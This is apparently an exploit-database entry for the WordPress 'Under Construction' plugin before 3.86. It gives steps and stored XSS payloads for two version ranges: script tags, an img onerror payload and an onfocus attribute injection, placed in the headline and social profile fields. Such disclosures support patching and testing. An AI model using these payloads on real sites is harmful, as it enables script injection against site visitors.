Exploit for Under Construction < 3.86 - Authenticated Stored Cross-Site Scripting (XSS)

Name: Exploit for Under Construction < 3.86 - Authenticated Stored Cross-Site Scripting (XSS)
Rating: 5 (51 reviews)

2021-01-20 | CVSS 0.2

## https://sploitus.com/exploit?id=WPEX-ID:2EC65510-5E4A-4AF5-AF58-3B0CA1B56C8D
Log in as admin, go to the plugin's settings (/wp-admin/options-general.php?page=ucp, Content tab), set the below field to the given value, save them and view either the preview or put the site under construction and view it (not as admin as they are whitelisted by default), to trigger the payloads.

v < 3.80
Headline: Sorry, we're doing some work on the site"/><script>alert(1337)</script>
Facebook Page, Twitter/LinkedIn/YT Profile (and potentially all Social & Contact Icons fields): https://w/"/><script>alert(1337)</script>

v < 3.86:
Headline: "><img src onerror=alert(/XSS/)>
Facebook Page, Twitter/LinkedIn/YT Profile (and potentially all Social & Contact Icons fields): https://w/" onfocus="alert(/XSS-Profile/)> (then click on the related icon in the frontend)